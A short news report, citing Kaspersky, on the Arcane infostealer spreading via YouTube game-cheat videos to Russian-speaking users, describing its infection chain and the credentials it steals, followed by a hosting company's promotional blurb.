YouTube videos promoting game cheats are being exploited to spread a new malware known as Arcane, primarily targeting Russian-speaking users. This malware is capable of collecting an extensive array of sensitive information from infected devices.
According to Kaspersky, Arcane can gather account details from various VPNs and gaming clients, as well as other network utilities. The attack typically involves sharing a link to a password-protected archive in YouTube videos. Once the link is accessed, it triggers a batch file that uses PowerShell to download additional malicious files.
The malware package includes two key components: one functions as a cryptocurrency miner, while the second is a variant of the Phemedrone Stealer, named VGS. Over time, VGS has been replaced by Arcane in these attacks.
Arcane not only steals login credentials, passwords, credit card data, and cookies from various web browsers but is also capable of collecting system data and configuration files from several apps, including:
- VPN Clients: OpenVPN, NordVPN, and others.
- Network Utilities: ngrok, Cyberduck, FileZilla, etc.
- Messaging Apps: ICQ, Skype, Discord, Telegram, and more.
- Email Clients: Microsoft Outlook.
- Gaming Services: Steam, Ubisoft Connect, and others.
- Crypto Wallets: Supporting multiple platforms like Ethereum and Jaxx.
Additionally, Arcane can take screenshots, enumerate running processes, and retrieve saved Wi-Fi network passwords. To extract sensitive browser data, it utilizes the Data Protection API and even deploys a utility called Xaitax to crack browser keys.
The threat actors involved have launched a related loader known as ArcanaLoader, which masquerades as a tool for downloading game cheats but actually installs the Arcane malware. The main targets of this campaign are users in Russia, Belarus, and Kazakhstan.
Kaspersky emphasized the adaptability of cybercriminals, noting their continuous enhancement of tools and methods for distributing malware. The multifaceted data collection capabilities of Arcane highlight the advanced techniques being employed to compromise user information.
Welcome to DediRock, your trusted partner in high-performance hosting solutions. At DediRock, we specialize in providing dedicated servers, VPS hosting, and cloud services tailored to meet the unique needs of businesses and individuals alike. Our mission is to deliver reliable, scalable, and secure hosting solutions that empower our clients to achieve their digital goals. With a commitment to exceptional customer support, cutting-edge technology, and robust infrastructure, DediRock stands out as a leader in the hosting industry. Join us and experience the difference that dedicated service and unwavering reliability can make for your online presence. Launch our website.